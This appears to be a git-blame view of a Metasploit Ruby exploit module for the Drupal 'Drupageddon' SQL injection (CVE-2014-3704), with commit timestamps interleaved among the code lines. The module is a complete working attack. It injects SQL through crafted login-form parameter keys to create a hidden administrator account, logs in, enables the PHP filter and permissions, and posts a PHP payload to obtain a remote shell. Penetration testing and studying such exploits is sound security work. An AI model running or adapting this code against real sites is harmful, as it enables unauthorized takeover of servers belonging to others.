2014-10-16 17:32:39 +00:00
|
|
|
##
|
2014-12-11 22:34:10 +00:00
|
|
|
# This module requires Metasploit: http://metasploit.com/download
|
2014-10-16 17:32:39 +00:00
|
|
|
# Current source: https://github.com/rapid7/metasploit-framework
|
|
|
|
##
|
|
|
|
|
|
|
|
require 'msf/core'
|
|
|
|
|
|
|
|
class Metasploit3 < Msf::Exploit::Remote
|
|
|
|
Rank = ExcellentRanking
|
|
|
|
|
|
|
|
include Msf::Exploit::Remote::HttpClient
|
|
|
|
|
|
|
|
def initialize(info={})
|
|
|
|
super(update_info(info,
|
|
|
|
'Name' => 'Drupal HTTP Parameter Key/Value SQL Injection',
|
|
|
|
'Description' => %q{
|
2014-10-17 17:39:25 +00:00
|
|
|
This module exploits the Drupal HTTP Parameter Key/Value SQL Injection
|
|
|
|
(aka Drupageddon) in order to achieve a remote shell on the vulnerable
|
|
|
|
instance. This module was tested against Drupal 7.0 and 7.31 (was fixed
|
|
|
|
in 7.32).
|
2014-10-16 17:32:39 +00:00
|
|
|
},
|
|
|
|
'License' => MSF_LICENSE,
|
|
|
|
'Author' =>
|
|
|
|
[
|
|
|
|
'SektionEins', # discovery
|
|
|
|
'Christian Mehlmauer', # msf module
|
|
|
|
'Brandon Perry' # msf module
|
|
|
|
],
|
|
|
|
'References' =>
|
|
|
|
[
|
2014-10-16 17:36:37 +00:00
|
|
|
['CVE', '2014-3704'],
|
|
|
|
['URL', 'https://www.drupal.org/SA-CORE-2014-005'],
|
|
|
|
['URL', 'http://www.sektioneins.de/en/advisories/advisory-012014-drupal-pre-auth-sql-injection-vulnerability.html']
|
2014-10-16 17:32:39 +00:00
|
|
|
],
|
|
|
|
'Privileged' => false,
|
|
|
|
'Platform' => ['php'],
|
|
|
|
'Arch' => ARCH_PHP,
|
|
|
|
'Targets' => [['Drupal 7.0 - 7.31',{}]],
|
|
|
|
'DisclosureDate' => 'Oct 15 2014',
|
|
|
|
'DefaultTarget' => 0
|
|
|
|
))
|
|
|
|
|
|
|
|
register_options(
|
|
|
|
[
|
|
|
|
OptString.new('TARGETURI', [ true, "The target URI of the Drupal installation", '/'])
|
|
|
|
], self.class)
|
|
|
|
|
|
|
|
register_advanced_options(
|
|
|
|
[
|
2014-10-17 13:52:47 +00:00
|
|
|
OptString.new('ADMIN_ROLE', [ true, "The administrator role", 'administrator']),
|
|
|
|
OptInt.new('ITER', [ true, "Hash iterations (2^ITER)", 10])
|
2014-10-16 17:32:39 +00:00
|
|
|
], self.class)
|
|
|
|
end
|
|
|
|
|
|
|
|
def uri_path
|
|
|
|
normalize_uri(target_uri.path)
|
|
|
|
end
|
|
|
|
|
|
|
|
def admin_role
|
|
|
|
datastore['ADMIN_ROLE']
|
|
|
|
end
|
|
|
|
|
2014-10-17 13:52:47 +00:00
|
|
|
def iter
|
|
|
|
datastore['ITER']
|
|
|
|
end
|
|
|
|
|
|
|
|
def itoa64
|
|
|
|
'./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz'
|
|
|
|
end
|
|
|
|
|
|
|
|
# PHPs PHPASS base64 method
|
|
|
|
def phpass_encode64(input, count)
|
|
|
|
out = ''
|
|
|
|
cur = 0
|
|
|
|
while cur < count
|
|
|
|
value = input[cur].ord
|
|
|
|
cur += 1
|
|
|
|
out << itoa64[value & 0x3f]
|
|
|
|
if cur < count
|
|
|
|
value |= input[cur].ord << 8
|
|
|
|
end
|
|
|
|
out << itoa64[(value >> 6) & 0x3f]
|
|
|
|
break if cur >= count
|
|
|
|
cur += 1
|
|
|
|
|
|
|
|
if cur < count
|
|
|
|
value |= input[cur].ord << 16
|
|
|
|
end
|
|
|
|
out << itoa64[(value >> 12) & 0x3f]
|
|
|
|
break if cur >= count
|
|
|
|
cur += 1
|
|
|
|
out << itoa64[(value >> 18) & 0x3f]
|
|
|
|
end
|
|
|
|
out
|
|
|
|
end
|
|
|
|
|
2014-10-16 17:32:39 +00:00
|
|
|
def generate_password_hash(pass)
|
|
|
|
# Syntax for MD5:
|
|
|
|
# $P$ = MD5
|
2014-10-17 13:52:47 +00:00
|
|
|
# one char representing the hash iterations (min 7)
|
2014-10-16 17:32:39 +00:00
|
|
|
# 8 chars salt
|
|
|
|
# MD5_raw(salt.pass) + iterations
|
2014-10-17 13:52:47 +00:00
|
|
|
# MD5 phpass base64 encoded (!= encode_base64) and trimmed to 22 chars for md5
|
|
|
|
iter_char = itoa64[iter]
|
|
|
|
salt = Rex::Text.rand_text_alpha(8)
|
2014-10-16 17:32:39 +00:00
|
|
|
md5 = Rex::Text.md5_raw("#{salt}#{pass}")
|
2014-10-17 13:52:47 +00:00
|
|
|
# convert iter from log2 to integer
|
|
|
|
iter_count = 2**iter
|
|
|
|
1.upto(iter_count) {
|
2014-10-16 17:32:39 +00:00
|
|
|
md5 = Rex::Text.md5_raw("#{md5}#{pass}")
|
|
|
|
}
|
2014-10-17 13:52:47 +00:00
|
|
|
md5_base64 = phpass_encode64(md5, md5.length)
|
2014-10-16 17:32:39 +00:00
|
|
|
md5_stripped = md5_base64[0...22]
|
2014-10-16 19:06:19 +00:00
|
|
|
pass = "$P\\$" + iter_char + salt + md5_stripped
|
2015-04-21 16:14:03 +00:00
|
|
|
vprint_status("#{peer} - password hash: #{pass}")
|
2014-10-16 17:32:39 +00:00
|
|
|
|
2014-10-17 13:52:47 +00:00
|
|
|
return pass
|
2014-10-16 17:32:39 +00:00
|
|
|
end
|
|
|
|
|
|
|
|
def sql_insert_user(user, pass)
|
2014-10-17 13:52:47 +00:00
|
|
|
"insert into users (uid, name, pass, mail, status) select max(uid)+1, '#{user}', '#{generate_password_hash(pass)}', '#{Rex::Text.rand_text_alpha_lower(5)}@#{Rex::Text.rand_text_alpha_lower(5)}.#{Rex::Text.rand_text_alpha_lower(3)}', 1 from users"
|
2014-10-16 17:32:39 +00:00
|
|
|
end
|
|
|
|
|
|
|
|
def sql_make_user_admin(user)
|
2014-10-17 13:52:47 +00:00
|
|
|
"insert into users_roles (uid, rid) VALUES ((select uid from users where name='#{user}'), (select rid from role where name = '#{admin_role}'))"
|
2014-10-16 17:32:39 +00:00
|
|
|
end
|
|
|
|
|
|
|
|
def extract_form_ids(content)
|
2014-12-30 08:12:39 +00:00
|
|
|
form_build_id = $1 if content =~ /name="form_build_id" value="(.+?)"/
|
|
|
|
form_token = $1 if content =~ /name="form_token" value="(.+?)"/
|
2014-10-16 17:32:39 +00:00
|
|
|
|
2015-04-21 16:14:03 +00:00
|
|
|
vprint_status("#{peer} - form_build_id: #{form_build_id}")
|
|
|
|
vprint_status("#{peer} - form_token: #{form_token}")
|
2014-10-16 17:32:39 +00:00
|
|
|
|
|
|
|
return form_build_id, form_token
|
|
|
|
end
|
|
|
|
|
|
|
|
def exploit
|
|
|
|
|
|
|
|
# TODO: Check if option admin_role exists via admin/people/permissions/roles
|
|
|
|
|
|
|
|
# call login page to extract tokens
|
|
|
|
print_status("#{peer} - Testing page")
|
|
|
|
res = send_request_cgi({
|
|
|
|
'uri' => uri_path,
|
|
|
|
'vars_get' => {
|
|
|
|
'q' => 'user/login'
|
|
|
|
}
|
|
|
|
})
|
|
|
|
|
|
|
|
unless res and res.body
|
|
|
|
fail_with(Failure::Unknown, "No response or response body, bailing.")
|
|
|
|
end
|
|
|
|
|
|
|
|
form_build_id, form_token = extract_form_ids(res.body)
|
|
|
|
|
|
|
|
user = Rex::Text.rand_text_alpha(10)
|
2014-10-17 13:52:47 +00:00
|
|
|
pass = Rex::Text.rand_text_alpha(10)
|
2014-10-16 17:32:39 +00:00
|
|
|
|
|
|
|
post = {
|
|
|
|
"name[0 ;#{sql_insert_user(user, pass)}; #{sql_make_user_admin(user)}; # ]" => Rex::Text.rand_text_alpha(10),
|
|
|
|
'name[0]' => Rex::Text.rand_text_alpha(10),
|
|
|
|
'pass' => Rex::Text.rand_text_alpha(10),
|
|
|
|
'form_build_id' => form_build_id,
|
|
|
|
'form_id' => 'user_login',
|
|
|
|
'op' => 'Log in'
|
|
|
|
}
|
|
|
|
|
|
|
|
print_status("#{peer} - Creating new user #{user}:#{pass}")
|
|
|
|
res = send_request_cgi({
|
|
|
|
'uri' => uri_path,
|
|
|
|
'method' => 'POST',
|
|
|
|
'vars_post' => post,
|
|
|
|
'vars_get' => {
|
|
|
|
'q' => 'user/login'
|
|
|
|
}
|
|
|
|
})
|
|
|
|
|
|
|
|
unless res and res.body
|
|
|
|
fail_with(Failure::Unknown, "No response or response body, bailing.")
|
|
|
|
end
|
|
|
|
|
|
|
|
# login
|
|
|
|
print_status("#{peer} - Logging in as #{user}:#{pass}")
|
|
|
|
res = send_request_cgi({
|
|
|
|
'uri' => uri_path,
|
|
|
|
'method' => 'POST',
|
|
|
|
'vars_post' => {
|
|
|
|
'name' => user,
|
|
|
|
'pass' => pass,
|
|
|
|
'form_build_id' => form_build_id,
|
|
|
|
'form_id' => 'user_login',
|
|
|
|
'op' => 'Log in'
|
|
|
|
},
|
|
|
|
'vars_get' => {
|
|
|
|
'q' => 'user/login'
|
|
|
|
}
|
|
|
|
})
|
|
|
|
|
2014-10-16 18:53:48 +00:00
|
|
|
unless res and res.code == 302
|
2014-10-16 17:32:39 +00:00
|
|
|
fail_with(Failure::Unknown, "No response or response body, bailing.")
|
|
|
|
end
|
|
|
|
|
|
|
|
cookie = res.get_cookies
|
2015-04-21 16:14:03 +00:00
|
|
|
vprint_status("#{peer} - cookie: #{cookie}")
|
2014-10-16 17:32:39 +00:00
|
|
|
|
|
|
|
# call admin interface to extract CSRF token and enabled modules
|
|
|
|
print_status("#{peer} - Trying to parse enabled modules")
|
|
|
|
res = send_request_cgi({
|
|
|
|
'uri' => uri_path,
|
|
|
|
'vars_get' => {
|
|
|
|
'q' => 'admin/modules'
|
|
|
|
},
|
|
|
|
'cookie' => cookie
|
|
|
|
})
|
|
|
|
|
|
|
|
form_build_id, form_token = extract_form_ids(res.body)
|
|
|
|
|
|
|
|
enabled_module_regex = /name="(.+)" value="1" checked="checked" class="form-checkbox"/
|
|
|
|
enabled_matches = res.body.to_enum(:scan, enabled_module_regex).map { Regexp.last_match }
|
|
|
|
|
|
|
|
unless enabled_matches
|
|
|
|
fail_with(Failure::Unknown, "No modules enabled is incorrect, bailing.")
|
|
|
|
end
|
|
|
|
|
|
|
|
post = {
|
|
|
|
'modules[Core][php][enable]' => '1',
|
|
|
|
'form_build_id' => form_build_id,
|
|
|
|
'form_token' => form_token,
|
|
|
|
'form_id' => 'system_modules',
|
|
|
|
'op' => 'Save configuration'
|
|
|
|
}
|
|
|
|
|
|
|
|
enabled_matches.each do |match|
|
|
|
|
post[match.captures[0]] = '1'
|
|
|
|
end
|
|
|
|
|
|
|
|
# enable PHP filter
|
|
|
|
print_status("#{peer} - Enabling the PHP filter module")
|
|
|
|
res = send_request_cgi({
|
|
|
|
'uri' => uri_path,
|
|
|
|
'method' => 'POST',
|
|
|
|
'vars_post' => post,
|
|
|
|
'vars_get' => {
|
|
|
|
'q' => 'admin/modules/list/confirm'
|
|
|
|
},
|
|
|
|
'cookie' => cookie
|
|
|
|
})
|
|
|
|
|
|
|
|
unless res and res.body
|
|
|
|
fail_with(Failure::Unknown, "No response or response body, bailing.")
|
|
|
|
end
|
|
|
|
|
|
|
|
# Response: http 302, Location: http://10.211.55.50/?q=admin/modules
|
|
|
|
|
|
|
|
print_status("#{peer} - Setting permissions for PHP filter module")
|
|
|
|
|
|
|
|
# allow admin to use php_code
|
|
|
|
res = send_request_cgi({
|
|
|
|
'uri' => uri_path,
|
|
|
|
'vars_get' => {
|
|
|
|
'q' => 'admin/people/permissions'
|
|
|
|
},
|
|
|
|
'cookie' => cookie
|
|
|
|
})
|
|
|
|
|
|
|
|
|
|
|
|
unless res and res.body
|
|
|
|
fail_with(Failure::Unknown, "No response or response body, bailing.")
|
|
|
|
end
|
|
|
|
|
|
|
|
form_build_id, form_token = extract_form_ids(res.body)
|
|
|
|
|
2014-10-16 18:53:48 +00:00
|
|
|
perm_regex = /name="(.*)" value="(.*)" checked="checked"/
|
2014-10-16 17:32:39 +00:00
|
|
|
enabled_perms = res.body.to_enum(:scan, perm_regex).map { Regexp.last_match }
|
|
|
|
|
|
|
|
unless enabled_perms
|
|
|
|
fail_with(Failure::Unknown, "No enabled permissions were able to be parsed, bailing.")
|
|
|
|
end
|
|
|
|
|
|
|
|
# get administrator role id
|
|
|
|
id = $1 if res.body =~ /for="edit-([0-9]+)-administer-content-types">#{admin_role}:/
|
2015-04-21 16:14:03 +00:00
|
|
|
vprint_status("#{peer} - admin role id: #{id}")
|
2014-10-16 17:32:39 +00:00
|
|
|
|
|
|
|
unless id
|
|
|
|
fail_with(Failure::Unknown, "Could not parse out administrator ID")
|
|
|
|
end
|
|
|
|
|
|
|
|
post = {
|
|
|
|
"#{id}[use text format php_code]" => 'use text format php_code',
|
|
|
|
'form_build_id' => form_build_id,
|
|
|
|
'form_token' => form_token,
|
|
|
|
'form_id' => 'user_admin_permissions',
|
|
|
|
'op' => 'Save permissions'
|
|
|
|
}
|
|
|
|
|
|
|
|
enabled_perms.each do |match|
|
|
|
|
post[match.captures[0]] = match.captures[1]
|
|
|
|
end
|
|
|
|
|
|
|
|
res = send_request_cgi({
|
|
|
|
'uri' => uri_path,
|
|
|
|
'method' => 'POST',
|
|
|
|
'vars_post' => post,
|
|
|
|
'vars_get' => {
|
|
|
|
'q' => 'admin/people/permissions'
|
|
|
|
},
|
|
|
|
'cookie' => cookie
|
|
|
|
})
|
|
|
|
|
|
|
|
unless res and res.body
|
|
|
|
fail_with(Failure::Unknown, "No response or response body, bailing.")
|
|
|
|
end
|
|
|
|
|
|
|
|
# Add new Content page (extract csrf token)
|
|
|
|
print_status("#{peer} - Getting tokens from create new article page")
|
|
|
|
res = send_request_cgi({
|
|
|
|
'uri' => uri_path,
|
|
|
|
'vars_get' => {
|
|
|
|
'q' => 'node/add/article'
|
|
|
|
},
|
|
|
|
'cookie' => cookie
|
|
|
|
})
|
|
|
|
|
|
|
|
unless res and res.body
|
|
|
|
fail_with(Failure::Unknown, "No response or response body, bailing.")
|
|
|
|
end
|
|
|
|
|
|
|
|
form_build_id, form_token = extract_form_ids(res.body)
|
|
|
|
|
|
|
|
# Preview to trigger the payload
|
|
|
|
data = Rex::MIME::Message.new
|
|
|
|
data.add_part(Rex::Text.rand_text_alpha(10), nil, nil, 'form-data; name="title"')
|
|
|
|
data.add_part(form_build_id, nil, nil, 'form-data; name="form_build_id"')
|
|
|
|
data.add_part(form_token, nil, nil, 'form-data; name="form_token"')
|
|
|
|
data.add_part('article_node_form', nil, nil, 'form-data; name="form_id"')
|
|
|
|
data.add_part('php_code', nil, nil, 'form-data; name="body[und][0][format]"')
|
|
|
|
data.add_part("<?php #{payload.encoded} ?>", nil, nil, 'form-data; name="body[und][0][value]"')
|
|
|
|
data.add_part('Preview', nil, nil, 'form-data; name="op"')
|
|
|
|
data.add_part(user, nil, nil, 'form-data; name="name"')
|
|
|
|
data.add_part('1', nil, nil, 'form-data; name="status"')
|
|
|
|
data.add_part('1', nil, nil, 'form-data; name="promote"')
|
|
|
|
post_data = data.to_s
|
|
|
|
|
|
|
|
print_status("#{peer} - Calling preview page. Exploit should trigger...")
|
|
|
|
send_request_cgi(
|
|
|
|
'method' => 'POST',
|
|
|
|
'uri' => uri_path,
|
|
|
|
'ctype' => "multipart/form-data; boundary=#{data.bound}",
|
|
|
|
'data' => post_data,
|
|
|
|
'vars_get' => {
|
|
|
|
'q' => 'node/add/article'
|
|
|
|
},
|
|
|
|
'cookie' => cookie
|
|
|
|
)
|
|
|
|
end
|
|
|
|
end
|